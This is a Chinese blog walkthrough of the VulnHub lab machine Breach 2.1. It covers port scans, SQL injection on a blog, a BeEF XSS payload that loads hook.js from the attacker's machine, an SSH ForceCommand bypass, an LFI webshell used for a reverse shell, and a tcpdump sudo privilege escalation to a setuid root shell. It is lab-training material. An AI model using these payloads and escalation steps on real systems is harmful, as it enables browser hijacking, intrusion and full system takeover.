lizi_blog

一些靶机笔记

View on GitHub

Breach2.1(vulnhub-hard)

靶机链接:https://www.vulnhub.com/entry/breach-21,159/

主机发现

这台靶机设置了静态ip(192.168.110.151) 所以打之前要把自己的机器设置到相同的C段

端口扫描

全端口扫描

┌──(kali㉿kali)-[~/breach]
└─$ sudo nmap -sT -sV -p- --min-rate 5000  192.168.110.151 -oA nmap/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 05:13 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00084s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
39250/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
MAC Address: 00:0C:29:B5:09:48 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds

默认脚本扫描

┌──(kali㉿kali)-[~/breach]
└─$ sudo nmap -sT -sV -sC -p80,111,39250,65535 192.168.110.151 -oA nmap/sC                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 05:13 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00025s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Initech Cyber Consulting, LLC
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38605/udp   status
|   100024  1          39250/tcp   status
|   100024  1          44325/udp6  status
|_  100024  1          55652/tcp6  status
39250/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
|   2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|   256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_  256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:B5:09:48 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds

漏洞脚本扫描

┌──(kali㉿kali)-[~/breach]
└─$ sudo nmap -sT -sV --script=vuln -p111,39250,65535 192.168.110.151 -oA nmap/vuln
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 10:34 EDT                 
Pre-scan script results:                                                           | broadcast-avahi-dos:                                                             |   Discovered hosts:                                                              |     224.0.0.251                                                                  |   After NULL UDP avahi packet DoS (CVE-2011-1002).                               |_  Hosts are all up (not vulnerable).                                             Nmap scan report for 192.168.110.151                                               Host is up (0.00038s latency).                                                     PORT      STATE SERVICE VERSION                                                    111/tcp   open  rpcbind 2-4 (RPC #100000)                                          | rpcinfo:                                                                         |   program version    port/proto  service                                         |   100000  2,3,4        111/tcp   rpcbind                                         |   100000  2,3,4        111/udp   rpcbind                                         |   100000  3,4          111/tcp6  rpcbind                                         |   100000  3,4          111/udp6  rpcbind                                         |   100024  1          38605/udp   status                                          |   100024  1          39250/tcp   status                                          |   100024  1          44325/udp6  status                                          |_  100024  1          55652/tcp6  status                                          39250/tcp open  status  1 (RPC #100024)                                            65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)               | vulners:                                                                         |   cpe:/a:openbsd:openssh:6.7p1:           
EDB-ID:45210    0.0     https://vulners.com/exploitdb/EDB-ID:45210      *EXPLOIT*
|       EDB-ID:40963    0.0     https://vulners.com/exploitdb/EDB-ID:40963      
...
...
...
*EXPLOIT*
|       EDB-ID:40962    0.0     https://vulners.com/exploitdb/EDB-ID:40962      *EXPLOIT*
|       1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
|       1337DAY-ID-26468        0.0     https://vulners.com/zdt/1337DAY-ID-26468        *EXPLOIT*
|_      1337DAY-ID-25391        0.0     https://vulners.com/zdt/1337DAY-ID-25391        *EXPLOIT*
MAC Address: 00:0C:29:B5:09:48 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.79 seconds

UDP扫描

┌──(kali㉿kali)-[~/breach]
└─$ sudo nmap -sU --top-ports 20 192.168.110.151 -oA nmap/UDP            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 10:34 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00025s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    open|filtered tftp
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:B5:09:48 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.47 seconds

65535(OpenSSH 6.7p1)

Branching

存在用户名枚举,暂时搁置 尝试连接一下,看有什么信息

Branching

有用户名peter,使用密码inthesource登录

Branching

连接被关闭,可见密码是正确的

111(RPCbind)

看起来并没有启动nfs和nis服务,showmount也证明了服务没有开启

80(web)

Branching

查看一下源码,没有什么信息

Branching

进行一下目录爆破吧

Branching

Branching

/image目录显示forbidden 查看一下/blog目录

Branching

访问到页面 发现search,sqlmap一把梭发现存在sql注入

Branching

查看有哪些数据库

Branching

发现blog和oscommerce两个比较特别的数据库

blog

查看所有表

Branching

查看blogphp_users

Branching

只发现了我们自己注册的账户

看来要去看看另外一个数据库

oscommerce

Branching

发现感兴趣的osc_administrators

Branching

拿到admin的密码hash

看起来像是md5,先鉴别一下

Branching

大概率是md5了

Branching

拿到一组凭据admin::32admin

Branching

在blog尝试登录似乎失败了,哎,兔子洞 再回web页面查看有什么信息

Branching

网站使用的blogphp

Branching

尝试了本地用户提权,但是就算拿到admin登录blog好像也没什么用

只能尝试xss了

结合主页面给的beef

Branching

我们使用beef-xss进行利用 查看exp

Branching

构造payload

<script src="http://192.168.110.128:3000/hook.js"></script>

Branching

访问members.html即可触发

Branching

可以发现左侧靶机的ip上线

发现了一篇精彩的文章,展示了利用msf+beef进行反弹shell 但是这里我的BeEF迟迟收不到上线的消息,所以干脆在register.html中注入我的payload

Branching

Branching

收到如图的返回说明session已经建立,用session -i 1 连接(这里的session可能会断,等下一次就好)

Branching

成功拿到shell,这里要去想一下我们的ssh连接为什么会被关闭

在/etc/ssh/sshd_config文件中发现

UsePAM yes
AllowUsers peter
ForceCommand /usr/bin/startme
AddressFamily inet

可以用echo "exec sh" > ~/.bashrc绕过 再次连接ssh

Branching

成功拿到立足点

提权枚举

升级终端

提升一下交互性

export TERM=xterm

信息枚举

在/var/www/html/blog/config.php中找到mysql的登录凭据

Branching

似乎用处不大,暂时保留

sudo -l

Branching

没有修改配置文件和设置LD_PRELOAD的权限

靠apache2提权只能暂时搁置

cat /etc/passwd

Branching

有用户peter、milton、blumbergh netstat -tlnp查看监听中的端口

Branching

2323似乎是没有扫出来的,看一下开启的是什么服务 gerp -rl 2323 /etc 2>/dev/null

Branching

Branching

开启的是telnet服务,尝试连接

Branching

给了一个经纬度地址,google一下

Branching

定位到了休斯顿 尝试下其他用户登录 发现milton::Houston可以登录,得到提示Whose stapler is it(也出现过在web页面)

Branching

查找一下stapler

Branching

Branching

回答mine

Branching

我们变成milton了! 发现又多了一个8888端口

Branching

看一下8888是什么服务

Branching

似乎是nginx 从浏览器访问发现确实是nginx

Branching

是之前发现的oscommerce 在milton的身份下发现无法在这里新建文件,只能利用oscommerce本身的漏洞了

Branching

查看有文件本地包含漏洞

Branching

查看有漏洞的文件,发现会先加一个.php后缀

Branching

新建一个/tmp/shell.php

Branching

Branching

我们得到了另一个用户的身份 反弹一个shell

Branching

终于我们可以愉快的提权了 tcpdump中有两个参数-z和-Z,前者用来执行一个脚本,后者用来指定tcpdump以哪个用户运行,当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而提权 编写提权脚本

cp /bin/bash /tmp/rootshell
chmod +sx /tmp/rootshell

sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp.sh -Z root

执行成功

Branching

定妆照

Branching

...